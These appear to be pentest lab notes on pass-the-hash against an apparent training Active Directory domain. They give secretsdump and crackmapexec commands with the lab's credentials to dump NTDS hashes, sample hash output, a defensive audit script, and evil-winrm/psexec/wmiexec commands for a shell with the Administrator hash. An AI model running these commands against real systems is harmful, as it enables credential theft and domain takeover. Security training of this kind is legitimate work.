# Pass The Hash

## Dump secrets

> Check whether our user can retrieve secrets (SAM and LSA secrets from the registry, NTLM hashes, plaintext credentials, Kerberos keys and a dump of NTDS.dit)

```bash
python3 /opt/impacket/examples/secretsdump.py 'spookysec.local/backup:23894712389057@10.10.253.172' -outputfile secretsdump.dump
```

Or use `crackmapexec`:

```bash
crackmapexec smb 10.10.253.172 -u 'backup' -p '23894712389057' --ntds
```

Example output (one `user:rid:lmhash:nthash:::` line per account):

```text
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
[...]
```
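The dump above follows the `user:rid:lmhash:nthash:::` layout that `secretsdump.py` and `crackmapexec --ntds` print. The following script is an added example written for these notes, not code from impacket or crackmapexec; it parses that layout and reports what an auditor reading such a dump wants to know first: accounts whose NT hash is the empty-password hash (as `Guest` above), accounts still storing a real LM hash, and groups of accounts that share one NT hash (password reuse). The `svc_backup` and `legacyuser` lines in the sample are constructed to exercise those checks.

```python
"""Audit a secretsdump-style hash file for weak-credential indicators.

Added example for these notes (not part of impacket or crackmapexec).
Input format, as printed by secretsdump.py / crackmapexec --ntds:
    user:rid:lmhash:nthash:::
Banner lines and the "[...]" truncation marker are ignored.
"""
import re
from collections import defaultdict

# Well-known sentinel values, both visible in the dump above:
# the NT hash of the empty password, and the LM value stored when LM hashing is disabled.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
NO_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# The user field may carry a "domain\" prefix, hence [^:]+ rather than \w+.
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::",
    re.IGNORECASE,
)


def parse_dump(text):
    """Return one dict per hash line, in file order; non-matching lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append({
                "user": m["user"],
                "rid": int(m["rid"]),
                "lm": m["lm"].lower(),
                "nt": m["nt"].lower(),
            })
    return entries


def audit(entries):
    """Flag empty passwords, LM hashes still present, and NT hashes shared by several accounts."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT_HASH],
        "lm_hash_present": [e["user"] for e in entries if e["lm"] != NO_LM_HASH],
        # Shared empty hashes are already reported above, so exclude them here.
        "shared_nt_hash": {
            h: users for h, users in by_nt.items()
            if len(users) > 1 and h != EMPTY_NT_HASH
        },
    }


# Constructed sample: the three lines shown in the notes plus two made-up accounts
# (svc_backup reuses the Administrator hash; legacyuser has an LM hash, values invented).
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
legacyuser:1106:1a2b3c4d5e6f70819293a4b5c6d7e8f9:f0e1d2c3b4a5968778695a4b3c2d1e0f:::
[...]
"""

if __name__ == "__main__":
    findings = audit(parse_dump(SAMPLE_DUMP))
    for key, value in findings.items():
        print(f"{key}: {value}")
```

Point `parse_dump` at the contents of the `-outputfile` produced by `secretsdump.py` (the `.ntds` file) to run the same checks on a real dump; the shared-hash report is the quickest way to spot service accounts that were given the Administrator password.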

## Use those secrets

With those hashes we can obtain a shell through several tools without knowing the plaintext password, for example as Administrator. Note that `evil-winrm -H` takes only the NT hash, while impacket's `-hashes` expects `LMhash:NThash`:

```bash
evil-winrm -i 10.10.253.172 -u Administrator -H '0e0363213e37b94221497260b0bcb4fc'
psexec.py Administrator@10.10.253.172 -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
wmiexec.py Administrator@10.10.253.172 -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
```

## References

{% embed url="https://medium.com/@benichmt1/secretsdump-demystified-bfd0f933dd9b" %}

{% embed url="https://www.thehacker.recipes/ad/movement/credentials/dumping/sam-and-lsa-secrets" %}

{% embed url="https://wadcoms.github.io/wadcoms/Impacket-SecretsDump/" %}
